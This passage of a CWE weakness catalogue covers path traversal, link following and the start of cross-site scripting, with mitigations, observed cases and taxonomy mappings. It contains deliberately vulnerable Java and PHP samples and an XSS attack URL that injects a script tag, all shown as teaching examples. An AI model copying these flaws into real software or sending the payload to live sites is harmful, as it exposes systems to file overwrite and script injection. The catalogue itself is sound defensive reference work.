The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The HTML code is the same as in the previous example with the action attribute of the form sending the upload file request to the Java servlet instead of the PHP code.

(Good Code)
Example Language: HTML 
<form action="FileUploadServlet" method="post" enctype="multipart/form-data">

Choose a file to upload:
<input type="file" name="filename"/>
<br/>
<input type="submit" name="submit" value="Submit"/>

</form>

When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.

(Bad Code)
Example Language: Java 
public class FileUploadServlet extends HttpServlet {

...

protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

response.setContentType("text/html");
PrintWriter out = response.getWriter();
String contentType = request.getContentType();

// the starting position of the boundary header
int ind = contentType.indexOf("boundary=");
String boundary = contentType.substring(ind+9);

String pLine = new String();
String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value

// verify that content type is multipart form data
if (contentType != null && contentType.indexOf("multipart/form-data") != -1) {

// extract the filename from the Http header
BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));
...
pLine = br.readLine();
String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));
...

// output the file to the local upload directory
try {
BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
for (String line; (line=br.readLine())!=null; ) {
if (line.indexOf(boundary) == -1) {
bw.write(line);
bw.newLine();
bw.flush();
}
} //end of for loop
bw.close();

} catch (IOException ex) {...}
// output successful upload response HTML page
}
// output unsuccessful upload response HTML page
else
{...}
}
...
}

This code does not check the filename that is provided in the header, so an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash.

Also, this code does not perform a check on the type of the file being uploaded. This could allow an attacker to upload any executable file or other file with malicious code (CWE-434).

+ Observed Examples
ReferenceDescription
Newsletter module allows reading arbitrary files using "../" sequences.
FTP server allows deletion of arbitrary files using ".." in the DELE command.
FTP server allows creation of arbitrary directories using ".." in the MKD command.
OBEX FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using ".." sequences.
Software package maintenance program allows overwriting arbitrary files using "../" sequences.
Bulletin board allows attackers to determine the existence of files using the avatar.
PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function.
Overwrite of files using a .. in a Torrent file.
Chat program allows overwriting files using a custom smiley request.
Chain: external control of values for user's desired language and theme enables path traversal.
Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass whitelist validation schemes by introducing dangerous inputs after they have been checked.

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:

  • realpath() in C

  • getCanonicalPath() in Java

  • GetFullPath() in ASP.NET

  • realpath() or abs_path() in Perl

  • realpath() in PHP

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.22.5]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [R.22.3] provide this capability.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phases: Architecture and Design; Operation

Strategy: Identify and Reduce Attack Surface

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class668Exposure of Resource to Wrong Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts (primary)1000
ChildOfCategoryCategory715OWASP Top Ten 2007 Category A4 - Insecure Direct Object Reference
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory813OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory932OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory981SFP Secondary Cluster: Path Traversal
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base23Relative Path Traversal
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base36Absolute Path Traversal
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness ClassWeakness Class20Improper Input Validation
Research Concepts1000
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness ClassWeakness Class172Encoding Error
Research Concepts1000
+ Relationship Notes

Pathname equivalence can be regarded as a type of canonicalization error.

Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not).

+ Research Gaps

Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.

Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable.

Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants.

+ Affected Resources
  • File/Directory
+ Relevant Properties
  • Equivalence
+ Functional Areas
  • File processing
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERPath Traversal
OWASP Top Ten 2007A4CWE More SpecificInsecure Direct Object Reference
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
CERT C Secure CodingFIO02-CCanonicalize path names originating from untrusted sources
WASC33Path Traversal
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP16Path Traversal
+ References
[R.22.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 11, "Directory Traversal and Using Parent Paths (..)" Page 370. 2nd Edition. Microsoft. 2002.
[R.22.2] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.22.3] [REF-32] OWASP. "Testing for Path Traversal (OWASP-AZ-001)". <http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.
[R.22.4] Johannes Ullrich. "Top 25 Series - Rank 7 - Path Traversal". SANS Software Security Institute. 2010-03-09. <http://blogs.sans.org/appsecstreetfighter/2010/03/09/top-25-series-rank-7-path-traversal/>.
[R.22.5] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.22.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Filenames and Paths", Page 503.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-14CWE Content TeamMITREInternal
updated Description
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-07-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Observed_Examples
2013-07-17CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2014-06-23CWE Content TeamMITREInternal
updated Other_Notes, Research_Gaps
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2017-05-03CWE Content TeamMITREInternal
updated Demonstrative_Examples
Previous Entry Names
Change DatePrevious Entry Name
2010-02-16Path Traversal

CWE-59: Improper Link Resolution Before File Access ('Link Following')

Weakness ID: 59
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
+ Alternate Terms
insecure temporary file:

Some people use the phrase "insecure temporary file" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

Operating Systems

Windows: (Sometimes)

UNIX: (Often)

+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Access Control

Technical Impact: Read files or directories; Modify files or directories; Bypass protection mechanism

An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism.

Technical Impact: Other

Remote Execution: Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since an ".LNK" file can be uploaded like a normal file.

+ Likelihood of Exploit

Low to Medium

+ Detection Methods

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Observed Examples
ReferenceDescription
Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.
Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.
Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.
Symlink attack allows local users to overwrite files.
Window manager does not properly handle when certain symbolic links point to "stale" locations, which could allow local users to create or truncate arbitrary files.
Second-order symlink vulnerabilities
Second-order symlink vulnerabilities
Symlink in Python program
Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.
Signal causes a dump that follows symlinks.
Hard link attack, file overwrite; interesting because program checks against soft links
Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.
Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.
Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.
Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.
Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.
Hard link race condition
Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment."
FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.
FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.
Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.
".LNK." - .LNK with trailing dot
Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link
File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.
Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Separation of Privilege

Follow the principle of least privilege when assigning access rights to entities in a software system.

Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.

+ Background Details

Soft links are a UNIX term that is synonymous with simple shortcuts on windows based platforms.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts (primary)1000
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory748CERT C Secure Coding Section 50 - POSIX (POS)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory980SFP Secondary Cluster: Link in Resource Name Resolution
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfCategoryCategory60UNIX Path Link Problems
Development Concepts (primary)699
ParentOfCompound Element: CompositeCompound Element: Composite61UNIX Symbolic Link (Symlink) Following
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant62UNIX Hard Link
Research Concepts (primary)1000
ParentOfCategoryCategory63Windows Path Link Problems
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant64Windows Shortcut Following (.LNK)
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant65Windows Hard Link
Research Concepts (primary)1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness BaseWeakness Base363Race Condition Enabling Link Following
Research Concepts1000
+ Relationship Notes

Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations.

Some potential factors are race conditions, permissions, and predictability.

+ Research Gaps

UNIX hard links, and Windows hard/soft links are under-studied and under-reported.

+ Affected Resources
  • File/Directory
+ Functional Areas
  • File processing, temporary files
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERLink Following
CERT C Secure CodingFIO02-CCanonicalize path names originating from untrusted sources
CERT C Secure CodingPOS01-CCheck for the existence of links when dealing with files
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP18Link in resource name resolution
+ References
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Symbolic Link Attacks", Page 518.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-10-29CWE Content TeamMITREInternal
updated Background_Details, Other_Notes
2010-02-16CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-06-23CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Link Following
2009-05-27Failure to Resolve Links Before File Access (aka 'Link Following')

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Weakness ID: 79
Abstraction: Base
Status: Usable
Presentation Filter:
+ Description

Description Summary

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Extended Description

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.

5. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent)

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent)

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS

In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."

In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.

+ Alternate Terms
XSS
CSS:

"CSS" was once used as the acronym for this problem, but this could cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Web-based: (Often)

Technology Classes

Web-Server: (Often)

Platform Notes

XSS flaws are very common in web applications since they require a great deal of developer discipline to avoid them.

+ Common Consequences
ScopeEffect
Access Control
Confidentiality

Technical Impact: Bypass protection mechanism; Read application data

The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.

Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws.

Confidentiality
Integrity
Availability
Access Control

Technical Impact: Execute unauthorized code or commands; Bypass protection mechanism; Read application data

The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server.

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.

+ Likelihood of Exploit

High to Very High

+ Enabling Factors for Exploitation

Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users, commonly on places such as bulletin-board web sites which provide web based mailing list-style functionality.

Stored XSS got its start with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code. As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response.

+ Detection Methods

Automated Static Analysis

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.

Effectiveness: Moderate

Black Box

Use the XSS Cheat Sheet [R.79.6] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Effectiveness: Moderate

With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store.

+ Demonstrative Examples

Example 1

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.

(Bad Code)
Example Language: PHP 
$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

